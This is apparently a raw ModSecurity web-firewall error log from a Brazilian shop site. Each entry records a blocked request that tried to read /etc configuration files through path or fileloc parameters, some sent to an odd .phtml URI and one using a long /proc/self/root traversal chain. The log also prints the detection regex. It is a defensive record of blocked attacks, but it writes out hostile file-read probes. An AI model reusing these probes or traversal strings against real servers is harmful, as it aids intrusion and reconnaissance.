[Thu Mar 19 13:21:40.260072 2026] [:error] [pid 27293:tid 140411607643904] [client 57.141.18.85:48598] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwik_-YZRR_7pZ7nDKeXgAAA9A"]
[Thu Mar 19 13:21:40.264850 2026] [:error] [pid 27403:tid 140411666392832] [client 57.141.18.53:48600] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikxkFeYa1D6dYQnAEIgAAAck"]
[Thu Mar 19 13:21:41.117016 2026] [:error] [pid 19093:tid 140411683178240] [client 57.141.18.53:48596] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilV_V7PWP6ixUYl7PmQAAAoc"]
[Thu Mar 19 13:21:41.360947 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.33:48622] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilf-YZRR_7pZ7nDKeXwAAA8c"]
[Thu Mar 19 13:21:41.598618 2026] [:error] [pid 17887:tid 140411716749056] [client 57.141.18.118:48626] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilQkwaGbbGflqUZDahQAAAMM"]
[Thu Mar 19 13:21:41.783269 2026] [:error] [pid 17887:tid 140411741927168] [client 57.141.18.53:48630] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilQkwaGbbGflqUZDahgAAAMA"]
[Thu Mar 19 13:21:41.984436 2026] [:error] [pid 27293:tid 140411674785536] [client 57.141.18.116:48634] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilf-YZRR_7pZ7nDKeYAAAA8g"]
[Thu Mar 19 13:21:42.106070 2026] [:error] [pid 27403:tid 140411733534464] [client 57.141.18.77:48636] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilhkFeYa1D6dYQnAEJAAAAcE"]
[Thu Mar 19 13:21:42.814651 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.106:48644] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwilgkwaGbbGflqUZDahwAAAME"]
[Thu Mar 19 13:21:43.097868 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.117:48650] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwil-oXxyEfFpUF8f8f5wAAAU4"]
[Thu Mar 19 13:21:43.294705 2026] [:error] [pid 30077:tid 140411649607424] [client 57.141.18.59:48656] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwil_u8EFLIOrSqIpu7bQAAAks"]
[Thu Mar 19 13:21:43.389561 2026] [:error] [pid 31803:tid 140411674785536] [client 57.141.18.99:48658] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwil-yqAr6etmhZHNpyzwAAAEg"]
[Thu Mar 19 13:21:43.787430 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.85:48666] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwil9a6ubjKNq_cu4ZpsAAAA0U"]
[Thu Mar 19 13:21:44.267557 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.0:48680] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimP-YZRR_7pZ7nDKeYQAAA88"]
[Thu Mar 19 13:21:44.741257 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.43:48690] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimAkwaGbbGflqUZDaiAAAAMU"]
[Thu Mar 19 13:21:44.798096 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:34778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwimBkFeYa1D6dYQnAEJwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Thu Mar 19 13:21:44.876563 2026] [:error] [pid 27293:tid 140411565680384] [client 57.141.18.39:48694] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimP-YZRR_7pZ7nDKeYgAAA9U"]
[Thu Mar 19 13:21:45.135179 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.53:48708] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimeoXxyEfFpUF8f8f6AAAAUQ"]
[Thu Mar 19 13:21:45.379112 2026] [:error] [pid 14269:tid 140411540502272] [client 57.141.18.2:48712] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimQbLMZ6AikZjR9VwYAAAABg"]
[Thu Mar 19 13:21:46.123236 2026] [:error] [pid 27293:tid 140411725141760] [client 57.141.18.123:48734] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimv-YZRR_7pZ7nDKeZAAAA8I"]
[Thu Mar 19 13:21:46.218501 2026] [:error] [pid 31803:tid 140411683178240] [client 57.141.18.25:48736] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimuyqAr6etmhZHNpy0QAAAEc"]
[Thu Mar 19 13:21:46.582186 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.83:48746] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimv-YZRR_7pZ7nDKeZgAAA8A"]
[Thu Mar 19 13:21:46.767159 2026] [:error] [pid 17887:tid 140411725141760] [client 57.141.18.107:48752] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwimgkwaGbbGflqUZDaiQAAAMI"]
[Thu Mar 19 13:21:47.403638 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.77:48762] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwim9a6ubjKNq_cu4ZpsgAAA1M"]
[Thu Mar 19 13:21:47.515719 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.53:48766] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwim9a6ubjKNq_cu4ZpswAAA08"]
[Thu Mar 19 13:21:47.896979 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.16:48782] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwim9a6ubjKNq_cu4ZptQAAA1I"]
[Thu Mar 19 13:21:48.136967 2026] [:error] [pid 17653:tid 140411632822016] [client 57.141.18.77:48788] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwinMdf6f5d65gmYZSMMAAAAs0"]
[Thu Mar 19 13:21:48.499777 2026] [:error] [pid 31803:tid 140411590858496] [client 57.141.18.38:48792] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwinOyqAr6etmhZHNpy0gAAAFI"]
